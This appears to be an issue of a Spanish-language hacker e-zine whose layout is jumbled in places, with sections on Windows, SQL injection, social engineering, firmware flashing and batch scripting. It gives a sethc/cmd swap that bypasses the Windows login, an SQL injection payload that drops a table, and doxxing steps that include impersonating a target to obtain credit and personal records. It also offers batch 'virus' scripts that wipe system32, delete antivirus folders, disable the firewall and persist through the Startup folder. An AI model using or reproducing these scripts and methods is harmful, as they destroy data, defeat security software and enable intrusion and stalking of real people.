CUH e-zine 2ª edicion

Introducción

Bienvenido a la CUH e-zine 2ª edición
Sean bienvenidos a la segunda edición de la revista CUH e-zine. Me complace presentaros esta gran e-zine que ha sido posible gracias a un gran trabajo llevado a cabo conjuntamente por numerosos usuarios de nuestra comunidad voluntariamente.Os hago un pequeño índice para que no os perdáis ; -)
-Introducción -Hacking nwb -Ingeniería Social -Como flashear su w600 -Introducción al bacth II -Introducción al lenguaje C -Metodología de programación -Introducción al ASM -Starting HTML -Seguridad informática -Herramientas administrativas -Guía distribuciones Linux -Marco Retro Style -Modding Gallery -Estructura Fisica del Disco Duro -Asterisk -Introducción a la Electrónica -Multimedia (Juegos) -Off topic- Humor 1 4 6 9 13 15 19 22 27 31 36 40 44 47 50 53 57 60 63

Solo me queda agradecer a todos los colaboradores por el gran trabajo que hacen todos y cada uno de ellos. Agradecimientos a: Aleksteir, LTSmash, gallloo, Furious Dami, ElPerro, ZYR, Ni0, The Shadow, Logan_Doax, |_ocutus, JUCA, elektro, MadMouse, DaRkDiAm0nd, nexus 1 ,Orlando_rock , veralex y channelly . Gracias a todos ellos ( espero no haberme dejado a nadie atrás ) , y sobre todo también a los lectores y usuarios que nos animan a todos a continuar con este gran proyecto. Espero que sea de su agrado. También me gustaría reconocer el trabajo de aleksteir, ya que sinceramente es uno de los organizadores que más empeño y trabajo ha puesto en la e-zine . Solo eso, espero que la disfruten ; )

CUH e-zine 2ª edicion

Hacking Newbie

Hacking Newbie
• •

By Furious Dami

Permisos para interactuar (darle comandos) con otros programas si un programa que interactúa con otro esta ejecutándose como Administrador o Limitado no puede transferir datos a otros programas. Como ya he dicho antes con SYSTEM si se puede ya que tiene más privilegios que un administrador.

OBTENIENDO PRIVILEGIOS SYSTEM

Comencemos Para empezar tenemos que abrir la carpeta System32 (esta ubicada en: C:\Windows\System32\) y en ella localizar el archivo: Sethc. Archivos Usados: Cmd: Es la consola, en donde ejecutaremos el explorador. Sethc: Es el programa que aparece cuando presionamos 5 veces seguidas Shift. A sethc lo copiamos en una carpeta. Ahora volvemos a System32 y nos olvidamos de la otra carpeta ya que no la necesitaremos por el momento. Ahora en System32 buscamos a Cmd y lo copiamos en la carpeta System32 (la que estamos), a la copia le cambiamos el nombre a Sethc y cerramos sección. Ahora en la Pantalla de Bienvenida (en donde se eligen los usuarios) presionamos 5 veces seguidas la tecla Shift. Nos aparecerá una pantallita negra (consola) y en ella escribiremos “Start Explorer” sin comillas. Si nos aparece la barra de tareas es porque todo funcionó bien. Ahora podemos hacer lo que queramos (incluso crear usuarios, cambiar la contraseña del administrador, etc.). Después para volver a dejar todo como estaba solo pegamos el archivo sethc (que copiamos en otra carpeta) en la carpeta System32 y listo. Ya esta todo arreglado.

Bueno, ahora aprenderemos a obtener privilegios SYSTEM en Windows (2k o superior).c Lo primero que debemos saber es: ¿QUE SON LOS PRVILEGIOS SYSTEM? SYSTEM es algo así como un súper usuario, ya que SYSTEM tiene más privilegios que un Administrador. Con System incluso podríamos borrar archivos que un administrador no puede, cambiar contraseñas del administrador principal, etc. ¿P ARA QUE WINDOWS USA SYSTEM? Esto es sencillo, como muchos de ustedes habrán visto en el Administrador de Tareas hay programas que en la columna de usuario dicen que están siendo ejecutados como “SYSTEM”. Este privilegio se le da a los programas por dos motivos: • • Para que sean más difíciles de finalizados por un virus o por el usuario. Debido a que el administrador no tiene ser

CUH e-zine 2ª edicion
INYECCIÓN SQL

Hacking Newbie

consulta := "SELECT * FROM usuarios WHERE nombre = '" + name + "';" Si escribes tu nombre (Ej: "Daniel"), nada anormal sucedería, la aplicación generaría una sentencia SQL parecida a la siguiente, que es correcta, en donde se seleccionaría al usuario "Daniel": SELECT * FROM usuarios WHERE nombre = 'Daniel'; Pero si un usuario malintencionado escribe como nombre de usuario: "Daniel'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%", se generaría la siguiente consulta SQL, (el color verde es lo que sucederia si solo pusiera el nombre, el azul es el dato, y el rojo, el código SQL inyectado): SELECT * FROM usuarios WHERE nombre = 'Daniel'; DROP TABLE usuarios; SELECT * FROM datos WHERE nombre LIKE '%'; La base de datos ejecutaría la consulta en orden, seleccionaría el usuario 'Daniel', borraría la tabla 'usuarios' y seleccionaría datos que no están disponibles para usuarios normales.

Es una vulnerabilidad al nivel de la validación de las entradas a la base de datos de una aplicación web. Se origina por el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Inyección SQL se le llama cuando se inserta o "inyecta" un código SQL “maligno" entro de otro código SQL para modificar su funcionamiento normal, y hacer que se ejecute maliciosamente el código en la base de datos. La inyección SQL es un problema de seguridad que debe ser tomado en cuenta por el programador para prevenirlo. Un programa hecho con descuido, ignorancia y falta de revisión, podrá ser vulnerable y la seguridad del sistema puede quedar ciertamente comprometida. Esta vulnerabilidad se da tanto en programas de escritorios como en paginas web, ya que éstas generalmente funcionan mediante programas que se ejecutan en el SERVIDOR que las aloja. La vulnerabilidad ocurre cuando un programa crea una sentencia SQL, que contiene la información necesitada y el código inyectado, y hace una consulta a la base de datos sin verificar el contenido de la sentencia. Al ejecutarse esa consulta en la base de datos, el código SQL inyectado también se ejecutará y podría hacer una cantidad de cosas, como insertar registros, modificar o eliminar datos, autorizar accesos e, incluso, ejecutar código malicioso en el computador. Supongamos que este código es de una aplicación web y contiene el parámetro name que es el valor de nombre que le dimos :

FAQ:
¿Porque se llama “Inyección”? Se llama inyección porque consiste en introducir dentro del código normal un código malicioso. En resumen, estamos inyectando un código malo dentro de un bueno.

Más Información
http://imperva.com/application_defense_center/glos sary/sql_injection.html http://msdn.microsoft.com/library/default.asp?url=/li brary/en-us/dnsqlmag04/html/InjectionProtection.asp http://governmentsecurity.org/articles/SQLinjectionB asicTutorial.php

CUH e-zine 2ª edicion

Ingeniería Social 2

Ingeniería Social

Parte 2

By ElPerro

humano, que está esperando a que alguien lo escuche, que lo interprete y por último, que establezca una conexión activa.

Ingeniería Social 2 Footprinting & Scanning [Recopilación de datos de un objetivo]
Lic. Dra. Mónica Fernández [Psicóloga] Dr. Javier Paradelo [Abogado] Lic. Aruel Ángel Drekk [ElPerro] La siguiente guía contó con asesoramiento de profesionales en medicina y leyes. Basado en experiencias propias y relato de terceros.

Conexiones Activas Concepto 2 Para entender el concepto. Una vez que enviamos una solicitud para conectarnos a un sistema, este nos solicita nombre de usuario y clave [autentificación], comprueba que esos nombres de usuario y clave estén en sus bases de datos [autenticación] y nos deja pasar. Esto establece una relación de “confianza” con ese sistema, nos deja pasar e incluso nos da la bienvenida en muchos casos. Cuando establecemos una relación de confianza con una persona, esta, al vernos llegar, nos abre las puertas, nos da la mano, nos deja pasar y nos da la bienvenida. Control Remoto Verbal [CRV, me gusta como suena] Concepto 3 Este es un concepto muy largo e incluso puede resultar aburrido, pero en la práctica resulta extremadamente entretenido. De todas formas voy a resumirlo todo lo que pueda sin perderle sentido. Aunque lo que sigue ahora puede parecer muy tonto o incluso ficticio, es real. Esta es una técnica muy usada en el ámbito comercial y publicitario. Cuantas veces un vendedor altamente experimentado tocó a nuestra puerta ofreciéndonos algún objeto o servicio que simplemente no necesitamos, pero que igual adquirimos…MUCHAS y si decís que no,

En términos informáticos, el Footprinting refiere al seguimiento de cerca de los recursos que posea un sistema objetivo. El Scanning, en cambio, refiere a un barrido general y a la vez profundo que haga visibles las brechas abiertas que un sistema posea, a fines de determinar puntos vulnerables en sus servicios y/o protocolos en ejecución. Analicemos los siguientes conceptos en orden de ejecución. Conexiones Pasivas Concepto 1 Cuando un sistema se encuentra “escuchando” [Listening] se puede denominar de alguna manera, que está a la espera de que se entable una conexión a ese puerto/sistema. Esto sería una manera de compararlo con el ser

CUH e-zine 2ª edicion
simplemente no te creo. Para la creación de este concepto conté con el asesoramiento de una Licenciada en psicología, la Dra. Mónica Fernández [MN: 75956] de la ciudad de Río Gallegos, Santa Cruz, Argentina. El individuo es inteligente, calculador, atento. La masa es tonta, temerosa y distraída, por ende, es miles de veces más simple engañar a un grupo numeroso de personas que a un solo individuo y es por eso que hay que analizar detalladamente cada concepto de estas guías antes de atreverse a actuar. Un ejemplo, enviar SpaMM o un HOAX a miles de personas causa que al menos un par de cientos, lo crean. Si lo envías a uno solo, es %80 seguro que no obtenés resultado alguno [aunque en este caso resulta muy estadístico mas que analítico].

Ingeniería Social 2

va a permitirte prestar extrema atención en todos los detalles. Lo Creas o no, vas a volverte sumamente observador en lo mas mínimo del ámbito cotidiano. Este es un don que poseen prácticamente todos los niños de 0 a 10 años y que desgraciadamente pierden con el paso del tiempo. Enfoque emisor Esto es mucho más complicado que lo anteriormente expuesto. Una vez que sientas que tenés toda la atención del emisor, es cuando podes tomar el verdadero control de la conversación y efectuar un ataque CRV [Perdón, pero me Resolver juegos como gusta mucho como “Encuentra las XX suena]. diferencias” o Comenzar a crucigramas ayuda gesticular y tremendamente. Situaciones cotidianas, verbalizar de la caseras como el cambio misma manera que de un objeto de lugar el emisor es una pueden hacer que tu parte importante de sentido de la percepción la práctica, el haber se agudice al máximo. prestado atención a sus ojos al hablar de diversos temas, nos permite saber cuales son sus intereses, y porque no, sus pasiones [ver concepto de Enfoque Visual]. Automáticamente generamos que el emisor [ahora receptor] confíe en cada palabra que sale de tu boca y preste atención a cada frase. Inconscientemente el individuo esta siendo “programado verbalmente”. No voy a extenderme en esto último debido a que varía tremendamente el resultado según la persona, pero básicamente el concepto es el mismo en el %100 de los casos. Solo recae en cada uno, en la experiencia, habilidad e imaginación. ¿Que tiene esto que ver con la Ingeniería Social? Mucho más de lo que uno imagina. Como dije una vez, un ladrón no va por la calle, ve un banco y dice “El día está lindo, los pájaros cantan, las mujeres pasean a sus maridos y/o mascotas…voy a robarlo…” y entra a punta de pistola, a ciegas, sin saber si hay guardias, cuantos son, si están armados o no, etc. Un ladrón que se precie como tal, va a estudiar atentamente a su objetivo, va a entablar una conexión activa o pasiva [ver conceptos] y por último, ataca. ¿Y el chiste donde está? Cuando establecemos una conexión activa con una persona, podemos absorber una cantidad impresionante de datos que, bien recopilados, pueden significar la diferencia entre un ataque exitoso y un tremendo fracaso. Por eso se hace importante esta recopilación de datos, llegado un momento, podemos hablar y gesticular, e incluso pensar y actuar como otra persona a tal punto de no reconocernos a nosotros mismos. Esto te puede

Enfoque receptor Antes de hablar hay que saber escuchar [Con esto me gané a las lectoras :p] y es así que debemos prestar una detenida atención a gestos, articulación verbal y enfoque visual del emisor para poder efectuar un movimiento acertado. Es como si un administrador te este dando su nombre de usuario y clave codificados, solo debemos decodificar el mensaje. Es muy difícil poder prestar atención a tantos detalles sin perder el hilo de la charla. Para esto, desarrollé una practica muy sencilla, que en pocas horas frente al espejo, la perfeccionás. Consiste en hablar sobre un tema interesante o no, e ir apuntando [anotando] o, porqué no, filmando [recomendado] cada gesto que efectuás, luego pasas a la charla, grabás la conversación y por último al enfoque visual ([+]). Se que resulta irrisorio e incluso ridículo. [+] Enfoque Visual El enfoque visual es una reacción involuntaria del ojo humano. Cuando una persona está ansiosa por una situación o un resultado, la pupila se dilata 5 veces su tamaño normal y cuando simplemente no se encuentra interesada, la pupila se contrae a un pequeño puntito negro en el iris… En esto se basa un vendedor experimentado cuando te mira a los ojos e incluso, los modernos “detectores de mentiras” que no solo basan su resultado en el ritmo cardíaco sino también en este concepto. Al terminar, simplemente analizá los resultados. Esto

CUH e-zine 2ª edicion
parecer muy gracioso, pero es totalmente involuntario y, si lo practicás alguna vez [aunque sea solo por diversión] vas a darte cuenta de lo que te digo.

Ingeniería Social 2

tremendamente fácil recoger datos de cualquier persona. Existen las unidades básicas o comandos en donde se reúnen los políticos postulantes a un cargo, sus seguidores, etc. Para debatir, conocerse y demás. Estos puntos de información nos proveen de un material invaluable: “El Padrón Electoral”. Un libraco enorme que posee datos tales como: -Nombre y apellido completos -Número de documento -Domicilio -Escuela en la que vota [esto no nos sirve para nada] Obtener esos datos también es viable con un padrón electrónico. En tu e-mail seguramente tenés muchos ofrecimientos de padrones y bases de datos de personas. Un sitio muy interesante es http://www.globinfo.com.ar [No es gratis] que te provee de un informe completo sobre un sujeto. Si vas a usarlo, te recomiendo establecerte una casilla de correo con un nombre como el de tu objetivo. Ej.: Javier Paradelo, creamos un e-mail como jparadelo@yahoo.com.ar de manera que la gente de GlobInfo solo revise el encabezado y lo envíe sin mas averiguaciones.

Práctica Al comenzar, como dije antes, debemos tener un objetivo. Vamos a comenzar recopilando información de nuestro objetivo estableciendo una CONEXIÓN P ASIVA. El Footprinting en Ingeniería Social Una persona normal tiene una casa, un trabajo, familia, en ocasiones auto, o un vehículo para movilizarse. Nombre y apellido Es muy simple esta averiguación de datos, probablemente lo más básico. Una forma fácil de averiguar todo dato posible es la recorrida por el vecindario, las simples consultas al almacén de la esquina pueden traer datos muy completos de la cantidad de habitantes de una vivienda.

NOTA: Recordemos un pequeño párrafo del articulo anterior [ver Introducción a la Ingeniería Social]. Hablo de la vestimenta/disfraces. Tenemos que mantener las formas. Vestirnos bien [traje, corbata, etc.] pero sin llamar la atención. No queremos que piensen que somos delincuentes y nos vean con desconfianza. Contar con un buen léxico, un trato simpático y agradable es primordial para no levantar ningún tipo de sospechas, pero debemos ser cautelosos, la idea principal es que, por mas simpáticos que seamos, deben olvidarse de nosotros ni bien cruzamos la puerta.
También es posible con solo pasar por fuera de la casa y recoger la correspondencia dirigida a ese domicilio. Pero atención: ESTO SI ES UN DELITO. Si ya teníamos el nombre y apellido, no es ningún reto la recopilación de otros datos. En Argentina, sobre todo en época de elecciones, es

Obtener datos financieros En Argentina una opción muy sencilla [y gratuita] es bcra.gov.ar. El sitio Web del Banco Central provee de información clara. Para esto debemos poseer el número de CUIL del objetivo [anses.gov.ar provee de esa info. en http://www.anses.gov.ar/autopista/Serv_publicos/cuil .htm ] e ingresarlo en el casillero ubicado en http://200.69.211.85/cenries/cr010000.asp?error=0 Esto puede darnos una muy buena señal de entrada al mundo de esta persona. Al saber si posee deudas o no, si tiene cuentas bancarias o no, si usa servicios de prestamos/tarjetas de crédito, etc. Podemos resumir nuestro trabajo ampliamente. [Editado para CUH EZINE] En el capitulo siguiente seguimos obteniendo datos vía telefónica, personalmente y acudiendo a vías externas [vecinos, etc.].
ElPerro – Río Gallegos, Santa Cruz, Argentina

CUH e-zine 2ª edicion

Flashear SU W600

Como Flashear Su w600
15

By ZyR

-Far Manager: http://www.4shared.com/file/25333230/bacf8a92/Fa rManager170.html?dirPwdVerified=6eef5d15 -SEFP: http://www.4shared.com/file/25333121/d695351c/SE FP .html?dirPwdVerified=6eef5d15 -Firmware (Con el que quieras actualizar el cel, Yo aqui te proporciono el R7CA017): **FS: http://www.4shared.com/file/24530151/fb4fe49c/W6 00_R7CA017_FS_AMERICA_2_RED49.html?dirPwdVe rified=6eef5d15 **MAIN: http://www.4shared.com/file/24526916/175f93ef/W6 00_R7CA017_MAIN_NAM_2_RED49.html?dirPwdVer ified=6eef5d15 -CDA (Custom pack): http://www.4shared.com/file/24526918/f0e7bee8/Cu stom_America_2.html?dirPwdVerified=6eef5d15 -Main Fake Del w550: http://www.4shared.com/file/24527299/fbd08cf2/w5 50_r2e_dcu49r.html?dirPwdVerified=6eef5d15

COMO FLASHEAR SU w600: *Introduccion: Este tutorial es para la comunidad Underground Hispana (www.el-hacker.com), Del area phreaking, Centrado a el “Flasheo de el celular sony ericsson w600i”... Bien primero que nada, Al final de este tutorial hay un “F .A.Q”, En donde se explican algunas preguntas frecuentes, Si tienes alguna(s) ve hasta abajo de este manual para leerlas... *Nota: Para ir a los enlaces debes de pulzar la tecla “Control” y dar clic sobre el enlace...

*POR FAVOR LEE TODO EL MANUAL ANTES DE HACERLO... *Archivos que necesitas: -Phone XS Alpha 3: http://www.4shared.com/file/24527296/6b6f9163/Ph one-XS_V210_Alpha3.html?dirPwdVerified=6eef5d15 -Phone XS Beta: http://www.4shared.com/file/24527155/5c95318c/Ph oneXS_V201_Beta_package.html?dirPwdVerified=6eef5d

Bien, Ya que tengas eso: Instalas el far manager, Cuando lo instales, Vas a la carpeta donde se instalo, Veras una carpeta llamada Plugins, DENTRO DE PLUGINS, Metes la carpeta SEFP...

CUH e-zine 2ª edicion
Dejas eso de lado por un momento... *NOTA: Debes de tener todo descomprimido, Estan en .rar debes de descomprimirlos (Los descomprimes con el WinRar, Si no lo tienes solo escribe en google o aqui en Ba-k: WinRar y Listo te salen las descargas)... Bueno, Ahora abres el phone XS Beta (Este no se instala solo lo abres, Ejecutas el .exe)... Cuando abras el phone xs beta aparece una ventana blanca que dice: File y Help Clic en: File -> Start Ahora se abre otra ventana, Hay abajo miras y dice: Settings, Flash, FSX™ y GDFS, Esta seleccionado el: Settings y Dice esto: -----------------------------------------------*Phone-XS Settings: **Communication Settings: ***Communication Device ***Baut Rate (Speed) ***Phone Model -----------------------------------------------Lo vas a configurar asi: -----------------------------------------------*Phone-XS Settings: **Communication Settings: ***Communication Device: USB ***Baut Rate (Speed): 921600 ***Phone Model: k750/D750/w800 (CID49) -----------------------------------------------Ahora seleccionas el de: Flash (Hasta abajo, En donde estaba seleccionado Settings)... Ahora dice: ------------------------------------------------*Flash Firmware: **Selec Firmware: ***Main Firmware ***File System Image **Choose operations: ***Flash Main Firmware ***Flash File System ***Customize File System **Procedure Control: ***Flash -------------------------------------------------

Flashear SU W600

Bien, Ahora lo vas a configurar asi: ------------------------------------------------*Flash Firmware: **Selec Firmware: ***Main Firmware: Aqui vas a meter el MAIN que descargaste de mi 4shared que es el MAIN mas reciente de este modelo: R7CA017 (El main es el archivo .mbn, REPITO, DEBE DE ESTAR DESCOMPRIMIDO, Osease en .mbn NO EN .rar) ***File System Image: Lo dejas en blanco **Choose operations: ***Flash Main Firmware: Marcas el cuadrito de este ***Flash File System: Lo dejas SIN marcar ***Customize File System: Lo dejas SIN marcar **Procedure Control: ***Flash: AUN NO LO OPRIMAS Sigue leyendo ------------------------------------------------*Ojo: Despues de aqui ya no hay vuelta atras... *NOTA IMPORTANTE: TODA TU MUSICA, IMAGENES, TONOS, JUEGOS, ETC, TODO, Va a ser eliminado de tu celular, Asi es que te recomiendo que antes de seguir, Bajes todas las cosas importantes que tengas en tu cel a tu compu, OJO: Los contactos tambien se eliminana, Asi es que pasalos a tu chip (SIM)... Bien, Ahora: Apagas tu celular, Le quitas la bateria, Le quitas el chip (SIM), Le pones la bateria, y Le conectas el cable USB, AUN NO LO CONECTES... (En el programa otra vez), Ya que ayas echo lo anterior: Le das clic en el boton de Flash y conectas el otro extremo del cable USB a la PC *NOTA: Debes de conectar el celular apretando la tecla "C" (NO la tecla 2, LA "C" DE BORRAR), Entonces APRIETAS LA TECLA "C" (La de borrar), y Conectas el cable USB... NO DEJES DE APRETAR LA "C" hasta que empiezen a salir las letras (CUANDO YA SALGAN LAS LETRAS PUEDES SOL TAR EL BOTON "C")... Notaras como en el programa empiezan a salir letras, y En la parte de abajo se empieza a cargar una barra, y Dice transferencia de flashblocks 1 de 300 y algo (Algo asi)... Esperas a que termine, Cuando termine debe de decir: Flash done* (o Algo asi)

CUH e-zine 2ª edicion
y La barra de abajo se abra llenado, y Dejaran de salir letras... Bien ahora le das clic en "Close" y desconectas el celular y LE QUITAS LA BATERIA, Despues de unos 10 sengundos se la vuelves a poner... (AUN NO LO PRENDAS)... Ahora cierras el programa phone xs beta, y Lo vuelves a abrir, Haces lo mismo, File -> Start, En settings lo configuras igual, SOLO QUE EN FLASH AHORA LO VAS A CONFIGURAR ASI: ------------------------------------------------*Flash Firmware: **Selec Firmware: ***Main Firmware: Lo dejas en blanco ***File System Image: Aqui vas a meter el FS (File System) que descargaste de mi 4shared que es el FS mas reciente de este modelo: R7CA017 (El FS es el archivo .fbn, REPITO, DEBE DE ESTAR DESCOMPRIMIDO, Osease en .fbn NO EN .rar) **Choose operations: ***Flash Main Firmware: Lo dejas SIN marcar ***Flash File System: Marcas el cuadrito de este ***Customize File System: Lo dejas SIN marcar **Procedure Control: ***Flash: Antes de que oprimas flash, Le conectas el cable a el celular (Si es que se lo desconectaste), y LUEGO APRIETAS "C" (La tecla de borrar), LE DAS CLIC EN FLASH y Conectas el otro extremo del cable a la PC... ------------------------------------------------y Va a pasar lo mismo que en el otro, Van a salir las letras y la barra se empezara a cargar, SOLO QUE AHORA SERAN MENOS "Flashblocks"... Cuando termine saldra lo mismo que el anterior, No recuerdo si sale: Flash done*, o Flash finish, El caso es que sale algo asi, y La barra estara llena y ya no saldran letras... Le das clic en "Close" y desconectas el celular, y LE QUITAS LA BATERIA por unos 10 segundos, y Se la vuelves a poner... Abrimos el phone xs alpha... Viene en la carpeta: Phone-XS_V2.10_Alpha3... (Imagen 1)... Ahora apagamos el celular... Le quitamos la pila... Le quitamos la SIM... Le ponemos la pila... Le damos clic en start en el phone... (Imagen 2)... Saldran unas letras... (Imagen 3)... Cuando salgan las letras... Conectamos el cel oprimiendo la tecla "c"... (Imagen 3) Verificamos que salga: ready for open! (Imagen 4)... Ahora veremos unas casillas para marcar... Marcaremos la primera: Flash Main Firmware

Flashear SU W600

(Imagen 5)... Ahora buscamos el main fake del w550 (.ssw)... y Lo abrimos (Imagen 5)... Cuando tengan todo como esta en la Imagen 5... Le damos clic en start... (Imagen 5)... y Veremos que sale esto: 5 flashblocks... (Imagen 6)... Cuando salga esto: Finishing flash... Quiere decir que ya termino (NOTA: Puede que se quede en 3 flashblocks, No te preocupes, Solo dale en Stop y luego en close)... (Imagen 7)... Cerramos el phone (Imagen 7)... Desconectamos el celular y le quitamos la pila... Ahora abres el Far manager YA CON EL SEFP en la carpeta plugins Debemos de entrar primero en la parte del celular a la ruta correspondiente de lo que vamos a meter... (Imagen 8)... *Yo abri la ruta para meterle menus flash... (tpa/preset/system/desktop/flash)... PERO TU DEBES tpa\preset\custom DE ABRIR ESTA RUTA:

De el lado de la PC... Hay que abrir la carpeta en donde tenemos el o los archivos que le vamos a meter (OSEASE EL CDA (Custom Pack, SOLO LOS ARCHIVOS SUEL TOS, NO LA CARPETA)... (Imagen 9)... Seleccionamos los archivos del lado de la PC (Boton derecho recuerden)... y le damos en copy (5 Copy)... (Imagen 9)... Saldra una ventana cuando y le damos otra vez en copy... (Imagen 10)... Va a salir una ventana en para que veas que se va cargando... Debes de esperar a que se quite... (Imagen 11)... Los debemos de visualizar del lado del celular ahora... (Imagen 12)... NOTA: En la ruta: tpa\preset\custom Hay una carpeta llamada drm ELIMINALA, Selecciónala con clic derecho del mouse y después clic en 8 Delete... *Bueno como recordaremos tenemos en modo flash el cel... Osea se que con el main fake del w550... Simplemente hay que meterle el MAIN ORIGINAL para que reviva de nuevo el cel... Ahora debemos de darle clic a los dos puntos (..) hasta que nos salga una ventana roja y le damos e YES... (Imagen 13)... Sabras que lo puedes desconectar cuando ya no salga nada del lado de el celular... y cierras el far... (Imagen 14)...

CUH e-zine 2ª edicion

Flashear SU W600

que no colocaste adecuadamente los archivos de el CDA, o bien no le colocaste el CDA, Repite de nuevo desde donde le metes el main fake (.ssw), y Ahora si súbele los archivos que trae dentro la carpeta CDA... P: y Esto de el flasheo para que me sirve¿?... Todo esta igual que antes... R: Bueno el flasheo sirve para varias cosas, Primeramente el flasheo es actualizar el firmware (software) de el celular, Si tenias una versión anterior de firmware solucionara algunos problemas que quizas puedas tener o tubiste (Se apagaba cuando baias música, Se trababa, Se ponía en blanco, Etc), Con este nuevo firm se solucionan esos problemas total o mayoritariamente, Aparte al flashear activas el flash lite del celular, Esto quiere decir que puedes meterle menus flash para reproducirlos como menus... P: Como le meto los menus flasH¿?... R: Sigue el mismo proseso de flasheo desde donde metes el main fake (.ssw), Es decir, Mete el main fake, Despues conectalo con el far manager, Solo que en vez de meter los archivos del CDA, Deberas de ir a esta ruta: tpa\preset\system\desktop\flash dentro de flash, Deberas meter los archivos .swf (Menus Flash Lite), y Despues sigues los mismos pasos, Sales de el far manager (..), y Le metes a el celular el MAIN ORIGINAL (.mbn), y Ahora solo tienes que activarlos con un tema .thm P: Donde consigo menús flash lite¿?... R: Bueno pues hay varias webs en donde puedes encontrar menús flash lite, Solo que en algunas necesitas cierta cantidad de mensajes para poder descargar, Yo tengo una web dedicada a la telefonía celular y hay puedes encontrar muchos menús flash: www.CityCelw.mi-web.es... P: Como activo los menús flash¿?... R: Con un tema normal (.thm), Tienes que editarlo, Primero lo abres con winrar, Sacas los archivos que tenga dentro, Imágenes etc, Abra un archivo llamado: theme.xml, Este archivo lo abrimos con el bloc de notas, y Después de la línea que diga: <Sony_ericsson_theme vercion=”4.0”> Abajo pondrán esto: <Desktop_style Type="File" Source="CambiarPorNombreDelMenuFlash.swf"/> Dejan todo lo demás igual, y Lo guardan, Ahora deben de comprimirlo TODO (Las imágenes, El archivo theme.xml, Todo lo que extrajeron de el .thm) en un archivo .tar, (Les recomiendo el programa IZArc), Después de que compriman TODO en el .tar solo es cuestión de cambiar la extensión .tar por .thm, y Listo, Lo suben a el celular y lo activan... *NOTA: El menú flash ya debe de estar dentro de el celular en la ruta: tpa\preset\system\desktop\flash En fin esas modificaciones entre muchas mas...

Ahora desconecta tu celular y quitale la pila... Abre el phone xs alpha (El que usamos para meter el MAIN FAKE DEL w550)... *AQUI HA QUE HACER LO DE LA PRIMERA Y P ARTE*: Le damos clic en start en el phone... Saldrán unas letras... Cuando salgan las letras... Conectamos el cel oprimiendo la tecla "c"... Verificamos que salga: ready for open!, Ahora veremos unas casillas para marcar... Marcaremos la primera: Flash Main Firmware... Ahora buscamos el MAIN ORIGINAL, OSEA EL ARCHIVO .mbn NO EL .ssw, EL .mbn... y Lo abrimos, Cuando tengan todo como esta en la imagen 8... Le damos clic en start... (Imagen 15)... *DESPUES ES LO MISMO... Solo Que Aqui Van a Ser 348 flashblocks (SI NO ME EQUIVOCO)... (Imagen 16)... Solo que cuando termine va a salir algo diferente a antes... (Imagen 17)... *Cuando Haya salido eso solamente tienen que cerrar el phone y desconectar su celular... Quitarle la pila por unos segundos... Meterle el chip... Ponerle la pila... y Prenderlo... Suerte a todos, y Pues ya saben que nadie los obliga a hacerlo... Suerte... Saludos... F .A.Qs: P: Corro riesgos al hacer esto¿?... R: Si, Si no lo haces bien, Corres el riesgo de que se dañe la GDFS (Global Data Flash Storage, Es una parte importante de el celular en donde se guardan datos como el CDA, IMEI, Modelo de Firmware, Etc), Para reparar este problema se necesita un cable de servicio y no son muy fáciles de conseguir que digamos... P: Termine el proceso y todo salió bien, Pero al prender el celular me dice: Error de configuración comuníquese con su operador local, Que paso¿?... R: Lo que paso es que no lo finalizaste bien, Es decir

CUH e-zine 2ª edicion

Introducción al Batch

INTRODUCCION AL BATCH 2

By Furious Dami

“C:\Windows\Menu Inicio\Programas\Inicio\” Exit Y lo tendríamos que guardar en la carpeta mis documentos com el nombre “apaga” y lo que es obvio, con extensión “.bat”. Explicación: @echo off

Programando…

Echo off sirve para que no se vean los comandos que coloquemos en el resto del Batch y el @ sirve para que no se vea el comando echo off.
Copy “C:\Documents and Settings\%username%\Mis documentos\apaga.bat” “C:\Windows\Menu Inicio\Programas\Inicio\” Sirve para copiar el archivo que se ha guardado con el comando para apagar en el inicio de sección, porque la carpeta Inicio tiene la capacidad de arrancar todo lo que esta adentro de ella cuando se inicia sección. Y %username% es para que aparezca en el lugar especificado el nombre de usuario (porque en la carpeta con el nombre de usuario se guarda los documentos del usuario). Exit Sirve para salir del programa y evitar que se quede abierto. Antídoto: Shutdown –a Sirve para anular las ordenes dadas por el comando shutdown. Pero hay que teclearlo en la consola. Destruyendo el Sistema Ahora crearemos un código para borrar todos los archivos del sistema y de arranque de Windows. (No se puede probar en su PC porque se rompería). El codigo sería: @echo off del /Q /F /S %systemroot%\system32\*.* exit Explicación:

Como programar en Batch y introducción a los comandos.
De aquí en adelante comenzaremos a crear los primeros programas como calculadoras, organizadores, virus, etc. Y nos introduciremos más a los comandos como GOTO, SET, ECHO, START, etc.

Los Virus en Batch
En Batch generalmente se programan gusanos o virus pero como son comandos MS-Dos y de Windows lo correcto sería llamarlos comandos maliciosos, a continuación veremos como se programan. Apagando la PC Aquí les voy a mostrar como se programa un virus que haga que cada vez que inicie la sección a los 10 segundos se apague la PC y muestre el mensaje: “Esto es un poderoso virus”. (Para probar solo escribir Shutdown –s –f –t 10 – “esto es un poderoso virus” y no preocuparse porque solo te apagara la PC y nada más ). El código para esto seria: @echo off Shutdown –s –f –t 10 –c “Esto es un poderoso virus” Copy “C:\Documents and Settings\%username%\Mis documentos\apaga.bat”

Del /Q /F /S *.*
Sirve para borrar todos los archivos de la carpeta “system32” que es una carpeta del sistema y el %systemroot% seria para ir a la carpeta del Sistema Operativo que podría se C:\Windows\ pero varia según la PC ,los parámetros del comando DEL fueron explicados anteriormente y los *.* sirven para darle la orden de que borre todos los nombres de archivos en todas las extensiones.

CUH e-zine 2ª edicion
Un Bucle infinito al inicio Un bucle es una serie de comandos que se repiten varias veces y que en este caso se van a repetir infinitamente. Vamos a hacer que cada vez que se inicie sección se abra infinitamente el Internet Explorer. El código es: @echo off :inicio Copy “C:\Documents and Settings\%username%\Mis documentos\bucle.bat” “C:\Windows\Menu Inicio\Programas\Inicio\” Goto bucle :bucle Start iexplore www.google.com Goto bucle tendríamos que guardarlo con el nombre “Bucle” en la carpeta Mis Documentos y así funcionaria. Explicación: del /Q /F /S *.*>nul cd .. cd “Kapersky Lab” del /Q /F /S *.*>nul cd .. cd “McAfee.com” del /Q /F /S *.*>nul cd .. cd “Nod32 Antivirus System” del /Q /F /S *.*>nul exit Explicación:

Introducción al Batch

net stop "Centro de seguridad" net stop "Firewall de windows/Conexion compartida a internet (ICS)"
Con esto paramos el Firewall y el Centro de Seguridad de Windows (también se paran algunos otros firewall’s adicionales que pueden estar protegiendo la PC).

:inicio y :bucle :Inicio sería una línea para dar inicio a los
